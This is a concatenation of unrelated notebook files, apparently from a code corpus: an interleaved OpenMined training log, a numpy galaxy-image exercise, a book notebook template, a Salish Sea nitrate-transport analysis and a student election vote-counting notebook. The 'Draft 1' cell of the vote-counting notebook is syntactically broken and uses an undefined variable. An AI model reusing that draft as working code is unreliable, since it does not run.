listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodall parts .... ['', 'Users', 'yanndupis', '.openmined']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
full path /Users/yanndupis/.openmined/grid/
full path /Users/yanndupis/.openmined/grid/adapters/
Loading data...
25000 train sequences
25000 test sequences
Average train sequence length: 238
Average test sequence length: 230
Pad sequences (samples x time)
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodx_train shape:
(25000, 400)
x_test shape: (25000, 400)
Build model...
QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb9 QmRJF6noF4RhmkDpkzbzP3KLitMZNHs8mg6vGT8J5zURAt
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
all parts .... ['', 'Users', 'yanndupis', '.openmined']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
full path /Users/yanndupis/.openmined/grid/
full path /Users/yanndupis/.openmined/grid/adapters/
Loading data...
25000 train sequences
25000 test sequences
Average train sequence length: 238
Average test sequence length: 230
Pad sequences (samples x time)
x_train shape:listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
(25000, 400)
x_test shape: (25000, 400)
Build model...
QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb10 QmS1KzjYMx1qjE3EvE3BJYBxjxQfXXrhthxteyqjBZWBFhlisting models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
all parts .... ['', 'Users', 'yanndupis', '.openmined']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
full path /Users/yanndupis/.openmined/grid/
full path /Users/yanndupis/.openmined/grid/adapters/
Loading data...
25000 train sequences
25000 test sequences
Average train sequence length: 238
Average test sequence length: 230
Pad sequences (samples x time)
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodx_train shape:
(25000, 400)
x_test shape: (25000, 400)
Build model...
[37m[40m TASKS [0m
From Name Address
==================================================================
QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb8 QmXCQVa2iXAPhFWDSRTVuh7kGSXiw1j5T7zGztPBBRwAQg
ALREADY SUBSCRIBED TO openmined:task:add:imdb8
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
all parts .... ['', 'Users', 'yanndupis', '.openmined']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
full path /Users/yanndupis/.openmined/grid/
full path /Users/yanndupis/.openmined/grid/adapters/
Loading data...
25000 train sequences
25000 test sequences
Average train sequence length: 238
Average test sequence length: 230
Pad sequences (samples x time)
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
x_train shape: (25000, 400)
x_test shape: (25000, 400)
Build model...ALREADY SUBSCRIBED TO openmined:task:add:imdb9
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodQmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb9 QmRJF6noF4RhmkDpkzbzP3KLitMZNHs8mg6vGT8J5zURAt
all parts .... ['', 'Users', 'yanndupis', '.openmined']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
full path /Users/yanndupis/.openmined/grid/
full path /Users/yanndupis/.openmined/grid/adapters/
Loading data...
25000 train sequences
25000 test sequences
Average train sequence length: 238
Average test sequence length: 230
Pad sequences (samples x time)
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
x_train shape: (25000, 400)
x_test shape: (25000, 400)
Build model...
QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb10 QmS1KzjYMx1qjE3EvE3BJYBxjxQfXXrhthxteyqjBZWBFhALREADY SUBSCRIBED TO openmined:task:add:imdb10
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
all parts .... ['', 'Users', 'yanndupis', '.openmined']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
full path /Users/yanndupis/.openmined/grid/
full path /Users/yanndupis/.openmined/grid/adapters/
Loading data...
25000 train sequences
25000 test sequences
Average train sequence length: 238
Average test sequence length: 230
Pad sequences (samples x time)
x_train shape: (25000, 400)
x_test shape: (25000, 400)
Build model...
|
numpy/Numpy_GalaxyMultiWaveLength_sol.ipynb | ###Markdown
Galaxy multiWaveLength Analysis using numpyData Source: https://asd.gsfc.nasa.gov Loading the libraries we need
###Code
%matplotlib inline
import numpy as np
import imageio
from skimage import color
import matplotlib.pyplot as plt
import copy
from skimage.color import rgb2gray
from PIL import Image
###Output
_____no_output_____
###Markdown
Creating a numpy array from an image file: load and display each picture from difference wavelength (GammaRay, Xray, Infrared, radio) find the shape of the array, explain each dimensionSample of output:(320, 5760, 3)
###Code
photo_xRay = imageio.imread('./multiwavelength/Xray.jpg')
fig, ax=plt.subplots(figsize=(18, 4))
ax.imshow(photo_xRay , cmap='gray')
print(photo_xRay.shape)
plt.imshow(photo_xRay)
plt.show()
###Output
_____no_output_____
###Markdown
As we have 3 dimensions (RGB)and RGB does not add information, merge all 3 dimensions in a single one using grey scale image using the function rgb2gray Sample of output:(320, 5760)
###Code
photo_xRay = imageio.imread('./multiwavelength/Xray.jpg')
photo_xRay_grey = color.rgb2gray(photo_xRay)
fig, axRay=plt.subplots(figsize=(18, 4))
axRay.imshow(photo_xRay_grey, cmap='gray')
print(photo_xRay_grey.shape)
photo_radio = imageio.imread('./multiwavelength/Radio.jpg')
photo_radio_grey = color.rgb2gray(photo_radio)
fig, axRadio=plt.subplots(figsize=(18, 4))
axRadio.imshow(photo_radio_grey, cmap='gray')
photo_gammaRay = imageio.imread('./multiwavelength/GammaRay.jpg')
photo_gammaRay_grey = color.rgb2gray(photo_gammaRay)
fig, axGamma=plt.subplots(figsize=(18, 4))
axGamma.imshow(photo_gammaRay_grey, cmap='gray')
###Output
(320, 5760)
###Markdown
Merge all 3 waveLength in a single rgb image. Define to which color are linked XRay, Radio and Gamma waveLengthSample of output:
###Code
photo_all_band=copy.deepcopy(photo_xRay)
photo_all_band[:,:,0]=photo_xRay_grey*255
photo_all_band[:,:,1]=photo_radio_grey*255
photo_all_band[:,:,2]=photo_gammaRay_grey*255
fig, axAll=plt.subplots(figsize=(18, 4))
axAll.imshow(photo_all_band)
###Output
_____no_output_____
###Markdown
apply some cleaning to remove noise with value <150Sample of output:
###Code
photo_all_band_cleaning_mask=photo_all_band<150
photo_all_band[photo_all_band_cleaning_mask]=0
fig, axFilter=plt.subplots(figsize=(18, 4))
axFilter.imshow(photo_all_band)
###Output
_____no_output_____
###Markdown
apply some cleaning to highlight part of the picture where XRay>220, Radio>150, GammaRay>150Sample of output:
###Code
photo_all_band_highligt_mask=(photo_all_band[:,:,0]>220)&(photo_all_band[:,:,1]>150)&(photo_all_band[:,:,2]>150)
print(photo_all_band_highligt_mask)
#photo_all_band[photo_all_band_highligt_mask]=255
plt.imshow(photo_all_band_highligt_mask)
photo_all_band_cleaned=copy.deepcopy(photo_all_band)
photo_all_band_cleaned[np.logical_not(photo_all_band_highligt_mask)]=0
fig, axHighLight=plt.subplots(figsize=(18, 4))
axHighLight.imshow(photo_all_band_cleaned)
###Output
[[False False False ... False False False]
[False False False ... False False False]
[False False False ... False False False]
...
[False False False ... False False False]
[False False False ... False False False]
[False False False ... False False False]]
###Markdown
Only a single part of the picture should be highlighted. Try to find the center of his position using the following mask:
###Code
total_rows, total_cols, total_layers = photo_all_band.shape
#print("photo_data = ", photo_data.shape)
X, Y = np.ogrid[:total_rows, :total_cols]
fig = plt.figure()
print("X = ", X.shape, " and Y = ", Y.shape)
plt.imshow(photo_all_band)
plt.show()
summ=0
for colPotentialCenter in range(0,total_cols,100):
for rowPotentialCenter in range (0,total_rows,100):
#print("center_row = ", center_row, "AND center_col = ", center_col)
dist_from_potential_center = (X - rowPotentialCenter)**2 + (Y - colPotentialCenter)**2
#print(dist_from_center)
radius = 1000
#print("Radius = ", radius)
circular_mask = (dist_from_potential_center > radius)
#print(circular_mask[1500:1550,2000:2200])
#photo_all_band_filtered[np.logical_not(circular_mask)] = 255
if (photo_all_band[np.logical_not(circular_mask)].sum()>summ):
summ=photo_all_band[np.logical_not(circular_mask)].sum()
centerOfBurstrowID=rowPotentialCenter
centerOfBurstcolID= colPotentialCenter
plt.show()
#print("center X = ", centerOfBurstrowID, " and center Y = ", centerOfBurstcolID)
fig, axCircular=plt.subplots(figsize=(18, 4))
axCircular.imshow(photo_all_band)
axCircular.vlines(centerOfBurstcolID,0,total_rows,colors='w')
axCircular.hlines(centerOfBurstrowID,0,total_cols,colors='w')
###Output
X = (320, 1) and Y = (1, 5760)
|
book/community/templates/template-environments-postprocessing.ipynb | ###Markdown
[Post-processing pipeline/dataset name]:::{eval-rst}:opticon:`tag`:badge:`[Environment],badge-primary`:badge:`Post-processing,badge-secondary`::: Context Purpose*Describe the purpose of the use case.* Post-processing approach*Describe the most relevant features of the post-processing pipeline.* Highlights*Provide 3-5 bullet points that convey the use case’s core procedures. Each bullet point must have a maximum of 85 characters, including spaces.** Highlight 1* Highlight 2 Contributions NotebookAuthor (role), Affiliation, GitHub alias Post-processing codebaseAuthor (role), Affiliation, GitHub alias Post-processing publications```{bibliography} :style: plain :list: bullet :filter: topic % "replace by the `topic` entry linked to the publication(s) in the `_bibliography/references.bib` file"``` Post-processing fundingIndicate details of the funding.:::{note}*Optional: add credits or acknowledgements to data providers or authors of code snippets*::: Install and load libraries*For installation, add only libraries not listed in the [environment.yml](https://github.com/alan-turing-institute/environmental-ds-book/blob/master/environment.yml) file, but required by the notebook. Libraries can be installed in silent mode e.g. `pip -q install `**For loading libraries, order them according to their role e.g. libraries to manipulate folders i.e. os (first), handle data i.e. numpy, xarray (second), visualisation e.g. holoviews (third), etc. The cell below contains two libraries, `os` and `warning` which are common among the notebooks. Don't remove them.*
###Code
import os
import warnings
warnings.filterwarnings(action='ignore')
###Output
_____no_output_____
###Markdown
Set project structure*The cell below creates a separate folder to save the notebook outputs. This facilitates the reader to inspect inputs/outputs stored within a defined destination folder. Change `` with your notebook identifier.*
###Code
notebook_folder = '../postprocessing/<replace-by-notebook-filename>'
if not os.path.exists(notebook_folder):
os.makedirs(notebook_folder)
###Output
_____no_output_____
###Markdown
Load data*Load full dataset from original or mirror sources. If the license of the dataset permits, we suggest creating sample data (preprocessed) for the notebook stored in a data repository e.g. Zenodo.* Preprocessing*Add code demonstrating the post-processing pipeline.* Outputs*Provide a brief inspection of the post-processing outputs and their interpretation* Summary*Provide 3-5 bullet points summarising the main aspects of the post-processing and tools covered in the notebook.* * Sentence 1 e.g. `tool-name` to perform...* Sentence 2 e.g. `tool-name` to perform... Additional information**License**: The code in this notebook is licensed under the MIT License. The Environmental Data Science book is licensed under the Creative Commons by Attribution 4.0 license. See further details [here](https://github.com/alan-turing-institute/environmental-ds-book/blob/master/LICENSE.md).**Contact**: If you have any suggestion or report an issue with this notebook, feel free to [create an issue](https://github.com/alan-turing-institute/environmental-ds-book/issues/new/choose) or send a direct message to [[email protected]](mailto:[email protected]).
###Code
from datetime import date
print(f'Last tested: {date.today()}')
###Output
_____no_output_____ |
notebooks/revisions/transportsUpper6-WithArrowsAndV-noMRub.ipynb | ###Markdown
6 m is mean nitricline depth and just below 10% light level
###Code
import matplotlib.pyplot as plt
import netCDF4 as nc
import numpy as np
import os
import glob
import datetime as dt
from salishsea_tools import viz_tools
from matplotlib.ticker import FormatStrFormatter
import cmocean
from salishsea_tools import viz_tools, evaltools as et
import NorthNut as nn
import matplotlib.gridspec as gridspec
import pickle
import matplotlib as mpl
import matplotlib.patheffects as path_effects
mpl.rc('xtick', labelsize=8)
mpl.rc('ytick', labelsize=8)
mpl.rc('legend', fontsize=8)
mpl.rc('axes', titlesize=8)
mpl.rc('axes', labelsize=8)
mpl.rc('figure', titlesize=8)
mpl.rc('font', size=8)
mpl.rc('text', usetex=True)
mpl.rc('text.latex', preamble = r'''
\usepackage{txfonts}
\usepackage{lmodern}
''')
mpl.rc('font', family='sans-serif', weight='normal', style='normal')
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
%matplotlib inline
ig0=nn.ig0
ig1=nn.ig1
jg0=nn.jg0
jg1=nn.jg1
tmask=nn.tmask
umask=nn.umask
vmask=nn.vmask
umask0=nn.umask0
vmask0=nn.vmask0
boxCol=nn.boxCol
colL=nn.colL
colR=nn.colR
e12t=nn.e12t
k=6 #depth presented here
k1=30 # max depth to do calcs to
start=dt.datetime(2015,5,15) # originally 5/15-8/15, but changed to even number of fortnights (6, end is included)
end=dt.datetime(2015,8,20)
mod_basedir='/data/eolson/results/MEOPAR/SS36runs/CedarRuns/rev_noMrubrum/'
mod_nam_fmt='long'
mod_flen=10
saveloc='/data/eolson/results/MEOPAR/SS36runs/calcFiles/NTransport/'
fver='noMrubrum'
###Output
_____no_output_____
###Markdown
made interval a multiple of a fortnight in attempt to minimize aliasing of tidal cycle:
###Code
dt.datetime(2015,5,15)+dt.timedelta(days=7*14)
# calc transports: boxes in full model coords
boxes,boxesS=nn.defboxes(k)
np.mean(nn.e1t[boxesS[4]['j'][1],boxesS[4]['i'][0]:boxesS[4]['i'][1]])
np.sum(tmask[6,boxesS[4]['j'][1],(boxesS[4]['i'][0]):(boxesS[4]['i'][1])])*427*7/1e6
np.sum(nn.e3t_0[:7,boxesS[4]['j'][1],boxesS[4]['i'][0]:boxesS[4]['i'][1]],0)
np.diff(np.array(([boxes[0]['j'][1]]+[boxes[el]['j'][0] for el in range(0,6)])))
fig,ax=plt.subplots(1,1,figsize=(3,5))
viz_tools.set_aspect(ax)
ax.pcolormesh(nn.vmask0)
ax.pcolormesh(nn.tmask[0,:,:])
#ax.contour(tmask[k,:,:],[.5])
ax.contour(tmask[0,:,:],[.5])
for el in boxes.keys():
iii,jjj=nn.makebox(nn.boxcoordsT(boxes[el]))
ax.plot(iii-ig0,jjj-jg0,'-',color='w',linewidth=1)
flistV=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_V',1)
flistU=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_U',1)
flistW=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_W',1)
#flistC=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'carp_T',1)
flistT=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'ptrc_T',1)
#flistP=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_T',1)
#flistGV=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_V',1)
#flistGU=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_U',1)
flistT.loc[0,['t_0']].values[0]
flistT.loc[len(flistT)-1,['t_n']].values[0]-dt.timedelta(days=1)
end
NBound, SBound, EBound, BBound, NBoundMix, SBoundMix, EBoundMix, BBoundMix, times, boxes = nn.calcTranspsReduced(
start,end,k1,mod_flen,fver,saveloc,boxes,boxesS,flistV,flistU,flistW,flistT,recalc=False)
# vertical transport into 4th box
np.shape(BBound[3])
###Output
_____no_output_____
###Markdown
NO3_VT v*dx*dz*C = mmol N/s NO3_UT u*dy*dz*C = m/s*m2*mmol/m3 = mmol N/s VLDFNO3 dC/dt= (F1-F0)/(dx*dy*dz) => F in mmol N/s ULDFNO3 mmol N/sNO3_WT w*dx*dy*C = mmol N/sVMIXNO3 ~(Cadz-Cbdz)/dt=mmol/m3*1/s*m = mmol N/m2/s
###Code
mapCol=(0.67, 0.8, 0.64) # rgb
cmb=cmocean.tools.crop_by_percent(cmocean.cm.balance, 45, which='both', N=None)
cmb.set_bad(mapCol)
cmc=cmocean.tools.crop_by_percent(cmocean.cm.tarn_r, 40, which='both', N=None)
cmc.set_bad(mapCol)
for el in BBound.keys():
print(el,np.mean(np.sum(BBound[el][:,:k]+BBoundMix[el][:,:k],1))*1e-3)
###Output
0 91.90835155323016
1 86.66483786685788
2 -109.28906201525717
3 61.488358886550685
4 -2.486394686184514
5 47.570619286285726
###Markdown
Sum of vertical mixing and transport NO3 supply to region in boxes:
###Code
np.mean(np.sum(BBound[0][:,:k]+BBoundMix[0][:,:k]+\
BBound[1][:,:k]+BBoundMix[1][:,:k]+\
BBound[2][:,:k]+BBoundMix[2][:,:k]+\
BBound[3][:,:k]+BBoundMix[3][:,:k]+\
BBound[4][:,:k]+BBoundMix[4][:,:k]+\
BBound[5][:,:k]+BBoundMix[5][:,:k],1))*1e-3
###Output
_____no_output_____
###Markdown
Divide by area:
###Code
ABoxes=nn.boxAreas(k)
# units are umol/m2/s
Asum=ABoxes[0]+ABoxes[1]+ABoxes[2]+ABoxes[3]+ABoxes[4]+ABoxes[5]
np.mean(np.sum(BBound[0][:,:k]+BBoundMix[0][:,:k]+\
BBound[1][:,:k]+BBoundMix[1][:,:k]+\
BBound[2][:,:k]+BBoundMix[2][:,:k]+\
BBound[3][:,:k]+BBoundMix[3][:,:k]+\
BBound[4][:,:k]+BBoundMix[4][:,:k]+\
BBound[5][:,:k]+BBoundMix[5][:,:k],1))/Asum*1e3
NBoundC, SBoundC, EBoundC, BBoundC, NBoundMixC, SBoundMixC, EBoundMixC, BBoundMixC = \
nn.transpConversions(boxes,NBound,SBound,EBound,BBound,NBoundMix,SBoundMix,EBoundMix,BBoundMix,k)
BBoundC
mask=dict()
mask['V']=vmask0
mask['U']=umask0
mask['W']=tmask[k,:,:]
fig=plt.figure(figsize=(7.5,5.2))
gs0=gridspec.GridSpec(2,2,hspace=0.24,wspace=.13,left=.01,right=.93,bottom=.022,top=.92,
width_ratios=[1,1],height_ratios=[1,1])
ax=list()
cbax=list()
for jx in range(0,2):
if jx==0:
gsi=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0,jx],
width_ratios=[10,10*(ig1-ig0-.5)/(ig1-ig0+13),11-10*(ig1-ig0-.5)/(ig1-ig0+13)],wspace=.1)
gsl=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[1,jx],
width_ratios=[10,10,1],wspace=.1)
elif jx==1:
gsi=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0,jx],
width_ratios=[10,10,1],wspace=.1)
gsl2=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[1,jx],
width_ratios=[10,10,1],wspace=.1)
ax1=fig.add_subplot(gsi[0])
ax1.get_xaxis().set_visible(False)
ax1.get_yaxis().set_visible(False)
viz_tools.set_aspect(ax1)
ax2=fig.add_subplot(gsi[1])
ax2.get_xaxis().set_visible(False)
ax2.get_yaxis().set_visible(False)
viz_tools.set_aspect(ax2)
ax3=fig.add_subplot(gsi[2])
ax.append(ax1,)
ax.append(ax2,)
cbax.append(ax3,)
ax4=fig.add_subplot(gsl2[0])
ax4.get_xaxis().set_visible(False)
ax4.get_yaxis().set_visible(False)
viz_tools.set_aspect(ax4)
ax5=fig.add_subplot(gsl2[1])
ax5.get_xaxis().set_visible(False)
ax5.get_yaxis().set_visible(False)
viz_tools.set_aspect(ax5)
ax6=fig.add_subplot(gsl2[2])
ax7=fig.add_subplot(gsl[0])
viz_tools.set_aspect(ax7)
ax9=fig.add_subplot(gsl[2])
ax.append(ax4,)
ax.append(ax5,)
ax.append(ax7,)
cbax.append(ax6,)
cbax.append(ax9,)
v1=3000
m=ax[0].pcolormesh(mask['V'],cmap=cmb)
ax[0].set_title('Northward NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nAdvection + Mixing')
m=ax[1].pcolormesh(mask['U'],cmap=cmb)
cb0=fig.colorbar(m,cax=cbax[0])
ax[1].set_title('Eastward NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nAdvection + Mixing')
v2=15
m=ax[2].pcolormesh(mask['W'],cmap=cmc)
ax[2].set_title('Vertical NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nAdvection')
m=ax[3].pcolormesh(mask['W'],cmap=cmc)
cb1=fig.colorbar(m,cax=cbax[1])
ax[3].set_title('Vertical NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nMixing')
nn.drawboxesV(ax[0],boxes,boxCol)
nn.drawboxesU(ax[1],boxes,boxCol)
nn.drawboxesT(ax[2],boxes,boxCol)
nn.drawboxesT(ax[3],boxes,boxCol)
for iax in ax:
iax.set_facecolor(mapCol)
ax[0].set_xlim(-13,ig1-ig0)
ax[1].set_xlim(0,ig1-ig0-.5)
ax[2].set_xlim(-13,ig1-ig0)
ax[3].set_xlim(-13,ig1-ig0)
ax[0].set_ylim(.5,jg1-jg0-.5)
ax[1].set_ylim(1,jg1-jg0)
ax[2].set_ylim(1,jg1-jg0)
ax[3].set_ylim(1,jg1-jg0)
nn.annotYTranspUpper(ax[0],boxes,NBoundC,SBoundC,NBoundMixC,SBoundMixC)
nn.annotXTranspUpper(ax[1],boxes,EBoundC,EBoundMixC)
nn.annotWTTranspUpper(ax[2],boxes,BBoundC)
nn.annotWMTranspUpper(ax[3],boxes,BBoundMixC)
x1=ax[1].get_position()
xc1=cbax[0].get_position()
cbax[0].set_position(mpl.transforms.Bbox.from_bounds(xc1.bounds[0],x1.bounds[1],.015,x1.bounds[3]))
x2=ax[3].get_position()
xc2=cbax[1].get_position()
cbax[1].set_position(mpl.transforms.Bbox.from_bounds(xc2.bounds[0],x2.bounds[1],.015,x2.bounds[3]))
fig.canvas.draw()
#fig.savefig('/data/eolson/results/MEOPAR/biomodelevalpaper/figsNNut/Ntransports0_k'+str(k)+'.png',dpi=300)
###Output
_____no_output_____ |
.ipynb_checkpoints/counting_election_votes_analysis-checkpoint.ipynb | ###Markdown
Counting Election Votes
###Code
# Import Dependencies
import os
import csv
# Set the File Path
filepath = os.path.join(".","resources","election_data_test.csv")
output_file = os.path.join(".", "votes.txt")
###Output
_____no_output_____
###Markdown
Draft 1
###Code
# Count all election votes in 2 loops
with open(filepath, newline='') as csvfile:
csvreader = csv.reader(csvfile, delimiter=',')
header = next(csvreader)
#print(header)
total_votes = []
for candidate_name in csvreader:
total_votes.append(candidate_name[2])
print(candidate_name[2])
votes_dict = {candidate:total_votes.count(candidate) for candidate in total_votes}
output=(
print("Election Results")
print(f"Total Votes: {len(candidate_votes}")
print(votes_dict)
print(f"{votes_dict['Khan']/len(candidate_votes)}% ({votes_dict['Khan']})
print(f"{votes_dict['Correy']/len(candidate_votes)}% ({votes_dict['Correy']})
print(f"{votes_dict['Li']/len(candidate_votes)}% ({votes_dict['Li']}))
with open(output_file, 'w') as txt_file:
txt_file.write(output)
###Output
_____no_output_____
###Markdown
Draft 2
###Code
# Short List Test - DRAFT
import os
import csv
filepath2 = os.path.join(".","election_data_test.csv")
output_file = os.path.join(".", "votes_test2.txt")
with open(filepath2, newline='') as csvfile2:
csvreader2 = csv.reader(csvfile2, delimiter=',')
header2 = next(csvreader2)
#print(header2)
votes = []
for candidate_name in csvreader2:
votes.append(candidate_name[2])
#print(votes)
votes_dict = {candidate:votes.count(candidate) for candidate in votes}
#############################
# WRONG PLACEMENT #
#output = (print(votes_dict))
otooley = "O'Tooley"
print("Election Results")
print(f"Total Votes: {len(votes)}")
#print(votes_dict)
print(f"Khan: {round((votes_dict['Khan']/len(votes))*100, 2)}% ({votes_dict['Khan']}) ")
print(f"Correy: {round((votes_dict['Correy']/len(votes))*100, 2)}% ({votes_dict['Correy']}) ")
print(f"Li: {round((votes_dict['Li']/len(votes))*100, 2)}% ({votes_dict['Li']}) ")
print(f"O'Tooley: {round((votes_dict[otooley]/len(votes))*100, 2)}% ({votes_dict[otooley]})" )
########################################################
maximum_vote = 0
winner_name = []
for key, value in votes_dict.items():
if value > maximum_vote:
maximum_vote = value
winner_name.append(key)
#print(winner_name[0])
#print(maximum_vote)
print(f"Winner: {winner_name[0]}")
#with open(output_file, 'w') as txt_file:
# txt_file.write(output)
###Output
_____no_output_____
###Markdown
FINAL
###Code
# JG's ANSWER!!! - FINAL FINAL FINFAL
import os
import csv
#filepath2 = os.path.join(".","election_data.csv")
filepath2 = os.path.join(".","election_data_test.csv")
output_file = os.path.join(".", "pypoll_votes_final.txt")
with open(filepath2, newline='') as csvfile2:
csvreader2 = csv.reader(csvfile2, delimiter=',')
header2 = next(csvreader2)
#print(header2)
votes = []
for candidate_name in csvreader2:
votes.append(candidate_name[2])
#print(votes)
votes_dict = {candidate:votes.count(candidate) for candidate in votes}
print("Done running")
#output = (print(votes_dict))
maximum_vote = 0
winner_name = []
for key, value in votes_dict.items():
if value > maximum_vote:
maximum_vote = value
winner_name.append(key)
#print(winner_name[0])
#print(maximum_vote)
#print(f"Winner: {winner_name[0]}")
print(votes_dict)
otooley = "O'Tooley"
output = (
f"Election Results\n"
f"Total Votes: {len(votes)}\n"
f"Khan: {round((votes_dict['Khan']/len(votes))*100, 2)}% ({votes_dict['Khan']})\n"
f"Correy: {round((votes_dict['Correy']/len(votes))*100, 2)}% ({votes_dict['Correy']})\n"
f"Li: {round((votes_dict['Li']/len(votes))*100, 2)}% ({votes_dict['Li']})\n"
f"O'Tooley: {round((votes_dict[otooley]/len(votes))*100, 2)}% ({votes_dict[otooley]})\n"
f"Winner: {winner_name[0]}\n"
)
with open(output_file, 'w') as txt_file:
txt_file.write(output)
print("Execution Completed")
###Output
_____no_output_____
###Markdown
Answer 2: using 3 loops
###Code
import os
import csv
filepath = os.path.join('.', "election_data_test.csv")
with open(filepath, newline="") as csvfile3:
csvreader3 = csv.reader(csvfile3, delimiter=',')
# print to see each row
#for row in csvreader3:
#print(row)
header3 = next(csvreader3)
votes = []
# segregrate the votes into a seperate list
for vote in csvreader3:
votes.append(vote[2])
#print(votes)
vote_dict2 = {}
for candidate in votes:
if candidate not in vote_dict2:
vote_dict2[candidate] = 0
#vote_dict2[candidate] += 1
if candidate in vote_dict2:
vote_dict2[candidate] += 1
print(vote_dict2)
winner = ["", 0]
for key, value in vote_dict2.items():
#print(key, value)
if value > winner[1]:
winner[1] = value
winner[0] = key
print(winner)
324 + 114 + 56 + 10
###Output
_____no_output_____
###Markdown
Play Cell for teaching
###Code
# votes = []
# for candidate_name in csvreader2:
# votes.append(candidate_name[2])
import os
import csv
#filepath2 = os.path.join(".","election_data.csv")
filepath2 = os.path.join(".","election_data_test.csv")
output_file = os.path.join(".", "pypoll_votes_final.txt")
with open(filepath2, newline='') as csvfile2:
csvreader2 = csv.reader(csvfile2, delimiter=',')
header2 = next(csvreader2)
#print(header2)
votes2 = [candidate_name[2] for candidate_name in csvreader2]
print(votes2)
otooley = "O'Tooley"
print(otooley)
# Example pulled from Stackoverflow
# votes = ['apple','red','apple','red','red','pear']
# d = {candidate:votes.count(candidate) for candidate in votes}
# print(d)
# -*- coding: UTF-8 -*-
"""PyPoll Homework Solution."""
# Incorporated the csv module
import csv
import os
# Files to load and output (Remember to change these)
file_to_load = os.path.join("election_data.csv")
#file_to_output = os.path.join("analysis", "election_analysis.txt")
# Total Vote Counter
total_votes = 0
# Candidate Options and Vote Counters
candidate_options = []
candidate_votes = {}
# Winning Candidate and Winning Count Tracker
winning_candidate = ""
winning_count = 0
# Read the csv and convert it into a list of dictionaries
with open(file_to_load) as election_data:
reader = csv.reader(election_data)
# Read the header
header = next(reader)
# For each row...
for row in reader:
# Run the loader animation
#print(". ", end=""),
# Add to the total vote count
